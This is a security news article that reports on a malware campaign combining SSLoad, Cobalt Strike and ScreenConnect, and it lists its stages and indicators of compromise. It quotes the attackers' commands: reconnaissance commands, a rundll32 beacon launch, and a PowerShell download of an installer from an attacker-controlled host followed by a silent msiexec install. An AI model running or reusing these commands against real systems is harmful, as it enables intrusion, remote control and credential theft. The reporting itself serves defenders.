Friday, November 1, 2024
HomeCyber AttackNew SSLoad Malware Combined With Tools Hijacking Entire Network Domain

New SSLoad Malware Combined With Tools Hijacking Entire Network Domain

Published on

Malware protection

A new attack campaign has been discovered to be employed by the FROZEN#SHADOW, which utilized SSLoad malware for its operations and Cobalt Strike Implants to pivot and take over the entire network.

In addition, the threat actors also used Remote Monitoring and management) software like ScreenConnect RMM for further control.

SSLoad is a well-designed malware that can stealthily infiltrate the systems, gather sensitive information, and exfiltrate the collected information back to the malware operators.

- Advertisement - SIEM as a Service

Moreover, the malware also leverages multiple backdoors and payloads to evade detection and maintain persistence.

Technical Analysis

This new attack campaign starts with a traditional phishing email containing a malicious link.

When users visit this link, it redirects them to mmtixmm[.]org URL to another download site where a JavaScript file is downloaded to the victim machine.

Is Your Network Under Attack? - Read CISO’s Guide to Avoiding the Next Breach - Download Free Guide

If this JavaScript file is manually executed, it performs several operations that will download and execute further payloads on the victim machine.

The targeting of these phishing email campaigns appears to be random, as the victims were in multiple countries, including Asia, Europe, and the Americas. 

Further investigations on the malware revealed that the attack takes place in different stages as follows:

  • Stage 1: Initial Execution – JavaScript
  • Stage 2: MSI File Execution
  • Stage 3: Malware Execution
  • Stage 4: Cobalt Strike Execution
  • Stage 5: RMM Software & Lateral Movement

Stage 1: Initial Execution – JavaScript

This initial stage involves the manual execution of the JavaScript file.

On analyzing the JS file out_czlrh.js, it was discovered that it consisted of 97.6% commented code with random characters to obfuscate the file.

However, removing the commented code revealed a crystal clear JS code that did not have any kind of obfuscation. 

JS file code with multiple commented code (Source: Securonix)

On analyzing the JS code, it was observed that the JS file performs multiple operations which starts with creating instances of ActiveXObject for WScript.Network and Scripting.FileSystemObject.

After this, the JS code, which contains “GetObject(“winmgmts:\\\\.\\root\\cimv2”),” tries to access WMI Object for simple command line operations.

Clean code after removing Comments from the JS code (Source: Securonix)

In addition, the code also sets up variables to manage the number of connection attempts and gather the connection status of a network share.

Further, the script also maps all the available drives to a network share located at \\wireoneinternet[.]info@80\share\.

The JS code also executes the “net use” command via WMI to map the network drive correctly.

After this, there is a three-second wait, after which it again runs the same command to confirm the mapping of the network drive.

Once all these steps are successfully completed, the script constructs a command to install an MSI package (slack.msi) from the mapped network drive using msiexec.exe.

Stage 2: MSI Execution

This slack.msi file is similar to the BazarBackdoor, often used by the TrickBot malware gang.

The malware was capable of filtrating networks and deploying additional payloads. However, after executing this slack.msi file, the malware communicates with multiple domains

  • wireoneinternet[.]info
  • skinnyjeanso[.]com
  • titnovacrion[.]top
  • Maramaravilha[.]com
  • globalsolutionunlimitedltd[.]com

Moreover, only after this is the SSLoad malware downloaded and executed.

The payloads of the SSLoad consist of a semi-randomly named DLL file, which is located in \%APPDATA%\local\digistamp\mbae-api-na.dll.

This DLL is, however, executed by Rundll32.exe, after which the DLL copies itself to %APPDATA%\Custom_update\. 

SSLoad DLL file details (Source: Securonix)

Stage 3: Malware Execution

In addition to the previous stage, the execution of the rundll32.exe command will also begin communication with two preconfigured C2 servers which are hxxps://skinnyjeanso[.]com/live/ and to hxxps://titnovacrion[.]top/live/. Following this, the malware begins to collect the system and user data for local host as well as the domain related information using following cmd.exe commands.

  • exe /c ipconfig /all
  • exe /c systeminfo
  • exe /c nltest /domain_trusts
  • exe /c nltest /domain_trusts /all_trusts
  • exe /c net view /all /domain
  • exe /c net view /all
  • exe /c net group “domain admins” /domain
  • exe /c wmic.exe /node:localhost /namespace:\\root\securitycenter2 path antivirusproduct get * /format:list
  • exe /c net config workstation
  • exe /c wmic.exe /node:localhost /namespace:\\root\securitycenter2 path antivirusproduct get displayname | findstr /v /b /c:displayname || echo no antivirus installed
  • exe /c whoami /groups

These collected information are then sent to the C2 servers via HTTPS connections. Once the threat actors receive this information from the infected system, they begin to execute some manual commands after confirming that the information is from a legitimate server and not from a honeypot. The manual commands executed by the threat actors are as follows:

  • exe -c “[console]::outputencoding = [console]::inputencoding = [system.text.encoding]::getencoding(‘utf-8’); cd c:\; powershell”
  • exe /groups
  • exe group “domain admins” /dom
  • exe /node:localhost /namespace:\\root\securitycenter2 path antivirusproduct get * /format:list

These commands were executed to manipulate and prob the server environment for the next stage of malware activities.

Stage 4: Cobalt Strike Beacon

This stage of the malware involves deploying the Cobalt Strike beacon on the systems after executing the manual commands.

Once this beacon is deployed, it becomes the primary means of communication for the C2. However, this beacon is dropped and executed via the following rundll32.exe command.

Rundll32.exe C:\ProgramData\msedge.dll,MONSSMRpgaTQssmrpgatq

Additionally, the threat actors also used this Cobalt Strike to download and install a ScreenConnect RMM software instance on the victim system using the following commands:

  • exe /c whoami /groups
  • exe /c wmic /node:localhost /namespace:\\root\securitycenter2 path antivirusproduct get * /format:list
  • exe /c iwr -uri “hxxps://t0talwar.screenconnect[.]com/bin/screenconnect.clientsetup.msi?e=access&y=guest&c=&c=tjx-usa.com&c=&c=dc&c=&c=&c=&c=” -outfile c:\programdata\msedgeview.msi
  • exe /c systeminfo
  • exe /c msiexec.exe /i C:\ProgramData\Msedgeview.msi /quiet /qn

Stage 5: RMM Software And Lateral Movement

Every single compromised system is controlled with the ScreenConnect RMM Software so as to maintain complete control on the system.

However, After this, the Lateral movement takes place by harvesting the credentials and other critical system details.

The enumeration of the environment is done using multiple PowerShell commands such as Invoke-ShareFinder, Find-DomainShare, and Get-DomainFileServer PowerShell commandlets.

The credential extraction is performed through which they can also obtain a domain admin account NTLM hash. 

Indicators Of Compromise

C2 Address

  • 85.239.54[.]190
  • 23.159.160[.]88
  • 23.95.209[.]148
  • 45.95.11[.]134
  • bjSdg0.pintaexoticfashion.co[.]in
  • l1-03.winupdate.us[.]to
  • 23-95-209-148-host.colocrossing[.]com:443
  • mmtixmm[.]org
  • wireoneinternet[.]info
  • skinnyjeanso[.]com
  • titnovacrion[.]top
  • simplyfitphilly[.]com
  • kasnackamarch[.]info
  • sokingscrosshotel[.]com
  • danteshpk[.]com
  • stratimasesstr[.]com
  • winarkamaps[.]com
  • globalsolutionunlimitedltd[.]com
  • maramaravilha[.]com
  • krd6[.]com
  • hxxps://t0talwar.screenconnect[.]com

Furthermore, a complete list of files/hashes used for this attack campaign can be found here.

Combat Email Threats with Easy-to-Launch Phishing Simulations: Email Security Awareness Training -> Try Free Demo 

Eswar
Eswar
Eswar is a Cyber security content editor with a passion for creating captivating and informative content. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news.

Latest articles

LightSpy iOS Malware Enhanced with 28 New Destructive Plugins

The LightSpy threat actor exploited publicly available vulnerabilities and jailbreak kits to compromise iOS...

ATPC Cyber Forum to Focus on Next Generation Cybersecurity and Artificial Intelligence Issues

White House National Cyber Director, CEOs, Key Financial Services Companies, Congressional and Executive Branch...

New PySilon RAT Abusing Discord Platform to Maintain Persistence

Cybersecurity experts have identified a new Remote Access Trojan (RAT) named PySilon. This Trojan...

Konni APT Hackers Attacking Organizations with New Spear-Phishing Tactics

The notorious Konni Advanced Persistent Threat (APT) group has intensified its cyber assault on...

Free Webinar

Protect Websites & APIs from Malware Attack

Malware targeting customer-facing websites and API applications poses significant risks, including compliance violations, defacements, and even blacklisting.

Join us for an insightful webinar featuring Vivek Gopalan, VP of Products at Indusface, as he shares effective strategies for safeguarding websites and APIs against malware.

Discussion points

Scan DOM, internal links, and JavaScript libraries for hidden malware.
Detect website defacements in real time.
Protect your brand by monitoring for potential blacklisting.
Prevent malware from infiltrating your server and cloud infrastructure.

More like this

LightSpy iOS Malware Enhanced with 28 New Destructive Plugins

The LightSpy threat actor exploited publicly available vulnerabilities and jailbreak kits to compromise iOS...

New PySilon RAT Abusing Discord Platform to Maintain Persistence

Cybersecurity experts have identified a new Remote Access Trojan (RAT) named PySilon. This Trojan...

Konni APT Hackers Attacking Organizations with New Spear-Phishing Tactics

The notorious Konni Advanced Persistent Threat (APT) group has intensified its cyber assault on...